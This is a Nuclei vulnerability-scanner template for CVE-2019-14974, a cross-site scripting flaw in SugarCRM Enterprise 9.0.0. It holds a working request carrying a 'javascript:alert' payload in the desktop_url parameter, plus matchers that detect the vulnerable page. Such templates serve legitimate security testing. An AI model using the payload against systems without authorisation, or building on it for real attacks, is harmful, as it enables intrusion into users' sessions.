nuclei-templates/cves/2019/CVE-2019-14974.yaml

22 lines
506 B
YAML

id: CVE-2019-14974
info:
name: SugarCRM Enterprise 9.0.0 - Cross-Site Scripting
author: madrobot
severity: low
tags: cve,cve2019,xss
requests:
- method: GET
path:
- "{{BaseURL}}/mobile/error-not-supported-platform.html?desktop_url=javascript:alert(1337);//itms://"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "url = window.location.search.split(\"?desktop_url=\")[1]"
part: body